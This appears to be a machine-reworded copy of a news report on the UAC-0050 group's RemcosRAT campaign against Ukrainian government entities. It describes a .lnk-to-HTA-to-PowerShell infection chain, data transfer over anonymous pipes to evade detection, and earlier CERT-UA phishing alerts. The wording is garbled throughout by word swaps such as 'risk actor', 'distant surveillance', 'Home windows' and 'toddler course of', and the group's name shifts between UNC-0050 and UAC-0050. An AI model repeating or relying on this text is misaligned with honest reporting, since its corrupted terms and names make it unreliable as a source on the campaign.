A risk actor recognized for repeatedly concentrating on organizations in Ukraine with the RemcosRAT distant surveillance and management software is again at it once more, this time with a brand new tactic for transferring knowledge with out triggering endpoint detection and response techniques.
The adversary, tracked as UNC-0050, is concentrated on Ukrainian authorities entities in its newest marketing campaign. Researchers at Uptycs who noticed it stated the assaults could also be politically motivated, with the objective of amassing particular intelligence from Ukrainian authorities companies. “Whereas the opportunity of state sponsorship stays speculative, the group’s actions pose an simple danger, particularly to authorities sectors reliant on Home windows techniques,” Uptycs researchers Karthickkumar Kathiresan and Shilpesh Trivedi wrote in a report this week.
The RemcosRAT Risk
Risk actors have been utilizing RemcosRAT — which began life as a reputable distant administration software — to regulate compromised techniques since a minimum of 2016. Amongst different issues, the software permits attackers to assemble and exfiltrate system, consumer, and processor data. It may bypass many antivirus and endpoint risk detection instruments and execute a wide range of backdoor instructions. In lots of situations risk actors have distributed the malware in attachments in phishing emails.
Uptycs has not been in a position to decide the preliminary assault vector within the newest marketing campaign simply but however stated it’s leaning towards job-themed phishing and spam emails as more than likely being the malware distribution methodology. The safety vendor based mostly its assessments on emails it reviewed that purported to supply focused Ukrainian navy personnel with consultancy roles at Israel’s Protection Forces.
The an infection chain itself begins with a .lnk file that gathers details about the compromised system after which retrieves an HTML app named 6.hta from an attacker-controlled distant server utilizing a Home windows native binary, Uptycs stated. The retrieved app incorporates a PowerShell script that initiates steps to obtain two different payload information (word_update.exe and ofer.docx) from an attacker-controlled area and — finally — to put in RemcosRAT on the system.
A Considerably Uncommon Tactic
What makes UNC-0050’s new marketing campaign totally different is the risk actor’s use of a Home windows interprocess communications function referred to as nameless pipes to switch knowledge on compromised techniques. As Microsoft describes it, an nameless pipe is a one-way communications channel for transferring knowledge between a guardian and a toddler course of. UNC-0050 is profiting from the function to covertly channel knowledge with out triggering any EDR or antivirus alerts, Kathiresan and Trivedi stated.
UNC-0050 will not be the primary risk actor to make use of pipes to exfiltrate stolen knowledge, however the tactic stays comparatively uncommon, the Uptycs researchers famous. “Though not completely new, this system marks a big leap within the sophistication of the group’s methods,” they stated.
That is removed from the primary time that safety researchers have noticed UAC-0050 trying to distribute RemcosRAT to targets in Ukraine. On a number of events final 12 months, Ukraine’s Pc Emergency Response Crew (CERT-UA) warned of campaigns by the risk actor to distribute the distant entry Trojan to organizations within the nation.
The latest was an advisory on Dec. 21, 2023, a few mass phishing marketing campaign involving emails with an attachment that purported be a contract involving Kyivstar, certainly one of Ukraine’s largest telecommunications suppliers. Earlier in December, CERT-UA warned of one other RemcosRAT mass distribution marketing campaign, this one involving emails purporting to be about “judicial claims” and “money owed” concentrating on organizations and people in Ukraine and Poland. The emails contained an attachment within the type of an archive file or RAR file.
CERT-UA issued comparable alerts on three different events final 12 months, one in November with courtroom subpoena-themed emails serving because the preliminary supply car; one other, additionally in November, with emails allegedly from Ukraine’s safety service; and the primary in February 2023 a few mass e-mail marketing campaign with attachments that gave the impression to be related to a district courtroom in Kyiv.
